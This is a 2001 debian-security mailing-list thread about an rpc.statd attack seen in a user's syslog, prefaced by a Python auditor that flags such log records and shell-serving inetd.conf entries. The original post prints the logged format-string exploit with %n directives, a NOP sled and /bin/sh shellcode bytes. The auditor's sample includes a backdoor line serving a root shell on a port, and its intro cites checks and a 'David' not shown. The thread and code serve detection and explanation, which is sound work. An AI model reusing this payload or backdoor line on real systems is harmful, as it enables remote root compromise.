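Two of the checks David lists above, as an added example that is not code from this thread: a small Python auditor that flags syslog records carrying the markers of the rpc.statd entry trevs posted (a %n format directive and a run of \220, which is how syslog writes the 0x90 NOP byte), and flags inetd.conf entries that serve a shell on a port, like the line David quotes. The sample log and inetd.conf lines are constructed and abbreviated.

```python
import re

# "May 24 10:20:34 noogies <message>"; continuation lines carry no header
SYSLOG_HEADER = re.compile(r"^([A-Z][a-z]{2} {1,2}\d{1,2} \d\d:\d\d:\d\d) (\S+) ?(.*)$")
WRITE_DIRECTIVE = re.compile(r"%\d*n")    # %n: the write primitive of a format-string bug
NOP_SLED = re.compile(r"(?:\\220){8,}")   # syslog prints 0x90 (x86 NOP) as octal \220
SHELL_NAMES = {"sh", "bash", "ksh", "csh", "tcsh", "zsh"}

def parse_syslog(text):
    """Group lines into (timestamp, host, message) records. A line without a
    header is a continuation: that is how a hostname with newlines gets logged."""
    records = []
    for line in text.splitlines():
        m = SYSLOG_HEADER.match(line)
        if m:
            records.append([m.group(1), m.group(2), m.group(3)])
        elif records:
            records[-1][2] += "\n" + line
    return [tuple(r) for r in records]

def statd_indicators(message):
    """Names of the attack markers present in one record's message text."""
    hits = []
    if "gethostbyname error for" in message and WRITE_DIRECTIVE.search(message):
        hits.append("format-string %n in rpc.statd hostname")
    if NOP_SLED.search(message):
        hits.append("NOP sled (run of \\220)")
    return hits

def scan_messages(text):
    """Return [(timestamp, host, indicators)] for every suspicious record."""
    found = [(ts, host, statd_indicators(msg)) for ts, host, msg in parse_syslog(text)]
    return [f for f in found if f[2]]

def audit_inetd(text):
    """Return (line_no, service, user, program) for inetd.conf entries whose
    server program is a shell; fields are service/type/proto/wait/user/program."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if len(fields) < 6 or fields[0].startswith("#"):
            continue
        service, user, program = fields[0], fields[4], fields[5]
        if program.rsplit("/", 1)[-1] in SHELL_NAMES:
            findings.append((n, service, re.split(r"[.:]", user)[0], program))
    return findings

# Constructed sample input, abbreviated from the entry in the original post
# (the real sled is hundreds of bytes long).
SAMPLE_MESSAGES = """\
May 24 10:08:11 noogies -- MARK --
May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for
%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\\220\\220\\220\\220\\220\\220\\220\\220\\220\\220
May 24 10:21:02 noogies sshd[212]: Accepted publickey for trevs from 192.0.2.10
"""
SAMPLE_INETD = """\
# constructed /etc/inetd.conf fragment
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd
9704    stream  tcp     nowait  root    /bin/sh sh -i
"""

if __name__ == "__main__":
    print(scan_messages(SAMPLE_MESSAGES))
    print(audit_inetd(SAMPLE_INETD))
```

Point the two functions at /var/log/messages and /etc/inetd.conf to run the same checks on a real box; tcpd logs from hosts.deny land in the same syslog file and parse the same way.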





Re: strange log entry

2001-05-24 Thread Noah L. Meyerhans
On Thu, May 24, 2001 at 01:34:01AM -0700, Jacob Meuser wrote:
 OpenBSD ships with rstatd and ruserd enabled by default and according to
 http://www.openbsd.org/
 
 Four years without a remote hole in the default install!
 
 Which begs the question, especially since the *BSD's release their
 sources under BSD style licenses, why does rpc remain a security problem
 in Linux?  Is it the kernel?  Is it the rpc code?

This is not the same stuff at all.  They ship with rstatd turned on, not
rpc.statd.  They are completely different.  rpc.statd is used by nfs.
rstatd is used by the rstat program, which tells you info about machines
on your network.  It is like running 'uptime' on all your machines at
once.

noah

-- 
 ___
| Web: http://web.morgul.net/~frodo/
| PGP Public Key: http://web.morgul.net/~frodo/mail.html 





RE: strange log entry

2001-05-24 Thread Ed Street
Hello,

the same can be said with nfs and coda/samba (windows filesharing), they are
both easily exploitable codes simply by the way they operate.  Basically, in a
nutshell, the code assumes too much which makes it easily exploitable.

Ed


-Original Message-
From: Jacob Meuser [mailto:[EMAIL PROTECTED]
Sent: Thursday, May 24, 2001 4:34 AM
To: debian-security@lists.debian.org
Subject: Re: strange log entry


On Thu, May 24, 2001 at 01:24:50AM -0400, Ed Street wrote:
 Hello,

 Well first off WHY are you running the rpc stuff?  (i.e. I can root a
redhat
 6.x box in under 30 seconds with a rpc exploit from a clean install)  Turn
 that stuff OFF.

Not to start a thread discussing OSes, but ...

OpenBSD ships with rstatd and ruserd enabled by default and according to
http://www.openbsd.org/

Four years without a remote hole in the default install!

Which begs the question, especially since the *BSD's release their
sources under BSD style licenses, why does rpc remain a security problem
in Linux?  Is it the kernel?  Is it the rpc code?

Simply curious,
[EMAIL PROTECTED]





RE: strange log entry

2001-05-24 Thread Ed Street
Hello,

that's simple ;)  If they were stable/non-exploitable then we'd be using rpc
in place of ssh ;)

Ed


-Original Message-
From: Jacob Meuser [mailto:[EMAIL PROTECTED]
Sent: Thursday, May 24, 2001 8:41 AM
To: debian-security@lists.debian.org
Subject: Re: strange log entry


On Thu, May 24, 2001 at 04:06:08AM -0800, Ethan Benson wrote:
 On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote:
  
  BS, when was the last time you installed OpenBSD?  I just did an install

 2.5
That was what, 2 years ago?

  today.  I guarantee portmap, ruserd, and rstatd are enabled by default,
  as the installer doesn't even ask what you want to activate, and these
  programs are part of the base tarball.

 in 2.5 ftpd, portmap, smtp, and identd were open, i am pretty sure
 rstatd was not.  2.6 i think disabled ftpd by default, shortly
 thereafter a root hole was found in openbsd's ftpd and they promptly
 said `ftpd is not enabled in the default install of 2.6 (or whatever)
 and thus there is no root hole in our default install'

Ah, they probably caught the problem shortly before 2.6 release,
and didn't have time to fix ftp code, but changing rc.conf was doable.
Anyway, as of 2.9, portmap, rstatd, ruserd, time, daytime, comsat,
sshd and identd are enabled by default.
Like I said, I didn't want to start a discussion about OpenBSD vs Linux,
I have seen posts from you saying that you like some features of OpenBSD,
/sbin/nologin for example.

I'm just curious why the 'r' tools are apparently so vulnerable in
Linux.  If the OpenBSD folks are willing to risk credibility by
claiming that their default install has no remote holes, while
enabling portmap and rstatd by default, why can't Linux users feel
safe running those daemons also?

[EMAIL PROTECTED]





Re: strange log entry

2001-05-24 Thread Mirek Kwasniak
On Thu, May 24, 2001 at 07:33:44AM +, Jim Breton wrote:
 On Thu, May 24, 2001 at 04:10:13PM +0900, Curt Howland wrote:
  the last two i understand, as well as domain, but sunrpc and 1171?
 
 man fuser.  Look for the -n option.

... or look for -p option of netstat :)

Mirek



strange log entry

2001-05-23 Thread trev26

Heya :)
 
I was running a 'tail -f' on my /var/log/messages and this entry appeared while
I was connected to the internet:

May 24 10:08:11 noogies -- MARK --
May 24 10:20:34 noogies
May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for
^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
May 24 10:20:34 noogies
Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ

and it has me worried it may be a security issue. I'm very new to linux, and
newer again to debian, and at this stage I really don't have a clue as to what
the above log entry is trying to tell me...

Any input or comments would be very appreciated :)

Thank you

- trevs


